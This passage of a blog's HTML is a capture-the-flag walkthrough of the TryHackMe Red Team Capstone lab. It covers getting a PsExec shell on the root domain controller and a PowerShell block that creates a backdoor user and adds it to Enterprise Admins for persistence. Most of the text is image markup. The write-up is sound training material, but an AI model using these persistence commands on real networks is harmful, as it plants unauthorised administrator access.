viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Great! It worked! We can also get a shell on the ROOTDC using <code>PsExec.exe<\/code>.<\/p>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911ca1f&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911ca1f\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"330\" data-attachment-id=\"521\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240207201911\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207201911.png?fit=1333%2C429&amp;ssl=1\" data-orig-size=\"1333,429\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240207201911\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207201911.png?fit=1024%2C330&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207201911.png?resize=1024%2C330&#038;ssl=1\" alt=\"\" class=\"wp-image-521\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207201911.png?resize=1024%2C330&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207201911.png?resize=300%2C97&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207201911.png?resize=768%2C247&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207201911.png?w=1333&amp;ssl=1 1333w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can submit the proof of compromise and get the flag for the ROOTDC machine. <\/p>\n\n\n\n<p>For persistence, we can create a new user and add it to the Enterprise Admin group so that we will have elevated privileges on all the domains. We can either use the below PowerShell commands or use GUI on CORPDC.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#282A36\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"$pwd = convertTo-SecureString Capstone1@ -AsPlainText -Force\n\nNew-ADUser -Name ishsomeroot -AccountPassword $pwd\n\n$User = Get-ADUser -Identity ishsome  -Server &quot;corpdc.corp.thereserve.loc&quot;\n\n$Group = Get-ADGroup -Identity &quot;Enterprise Admins&quot; -Server &quot;rootdc.thereserve.loc&quot;\n\nAdd-ADGroupMember -Identity $Group -Members $User -Server &quot;rootdc.thereserve.loc&quot;\" style=\"color:#F8F8F2;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki dracula\" style=\"background-color: #282A36\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #BD93F9\">$pwd<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #8BE9FD\">convertTo-SecureString<\/span><span style=\"color: #F8F8F2\"> Capstone1@ <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">AsPlainText <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Force<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #8BE9FD\">New-ADUser<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Name ishsomeroot <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">AccountPassword <\/span><span style=\"color: #BD93F9\">$pwd<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">$User <\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #8BE9FD\">Get-ADUser<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Identity ishsome  <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Server <\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">corpdc.corp.thereserve.loc<\/span><span style=\"color: #E9F284\">&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">$Group <\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #8BE9FD\">Get-ADGroup<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Identity <\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">Enterprise Admins<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Server <\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">rootdc.thereserve.loc<\/span><span style=\"color: #E9F284\">&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #8BE9FD\">Add-ADGroupMember<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Identity $Group <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Members $User <\/span><span style=\"color: #FF79C6\">-<\/span><span style=\"color: #F8F8F2\">Server <\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">rootdc.thereserve.loc<\/span><span style=\"color: #E9F284\">&quot;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li>We will create a user called <code>ishsome<\/code><\/li>\n\n\n\n<li>Add this user to the <code>Enterprise Admins<\/code> and <code>Remote Desktop Users<\/code> group<\/li>\n\n\n\n<li>Use RDP to connect to all other machines on the network<\/li>\n<\/ul>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911d104&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911d104\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"555\" data-attachment-id=\"522\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210181157\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181157.png?fit=1285%2C696&amp;ssl=1\" data-orig-size=\"1285,696\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210181157\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181157.png?fit=1024%2C555&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181157.png?resize=1024%2C555&#038;ssl=1\" alt=\"\" class=\"wp-image-522\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181157.png?resize=1024%2C555&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181157.png?resize=300%2C162&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181157.png?resize=768%2C416&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181157.png?w=1285&amp;ssl=1 1285w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911d5e4&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911d5e4\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"518\" data-attachment-id=\"523\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210181235\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181235.png?fit=1339%2C677&amp;ssl=1\" data-orig-size=\"1339,677\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210181235\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181235.png?fit=1024%2C518&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181235.png?resize=1024%2C518&#038;ssl=1\" alt=\"\" class=\"wp-image-523\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181235.png?resize=1024%2C518&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181235.png?resize=300%2C152&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181235.png?resize=768%2C388&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181235.png?w=1339&amp;ssl=1 1339w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911da6e&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911da6e\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"546\" data-attachment-id=\"524\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210181620\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181620.png?fit=1317%2C702&amp;ssl=1\" data-orig-size=\"1317,702\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210181620\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181620.png?fit=1024%2C546&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181620.png?resize=1024%2C546&#038;ssl=1\" alt=\"\" class=\"wp-image-524\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181620.png?resize=1024%2C546&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181620.png?resize=300%2C160&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181620.png?resize=768%2C409&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181620.png?w=1317&amp;ssl=1 1317w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"33-compromising-bankdc-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Compromising BANKDC<\/mark><\/h2>\n\n\n\n<p>We should be able to connect to BANKDC now and submit the proof of compromise.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911df8b&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911df8b\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"545\" data-attachment-id=\"525\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210181829\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181829.png?fit=1393%2C742&amp;ssl=1\" data-orig-size=\"1393,742\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210181829\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181829.png?fit=1024%2C545&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181829.png?resize=1024%2C545&#038;ssl=1\" alt=\"\" class=\"wp-image-525\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181829.png?resize=1024%2C545&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181829.png?resize=300%2C160&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181829.png?resize=768%2C409&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210181829.png?w=1393&amp;ssl=1 1393w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911e40a&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911e40a\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"612\" data-attachment-id=\"527\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210201339\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210201339.png?fit=1256%2C751&amp;ssl=1\" data-orig-size=\"1256,751\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210201339\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210201339.png?fit=1024%2C612&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210201339.png?resize=1024%2C612&#038;ssl=1\" alt=\"\" class=\"wp-image-527\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210201339.png?resize=1024%2C612&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210201339.png?resize=300%2C179&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210201339.png?resize=768%2C459&amp;ssl=1 768w, 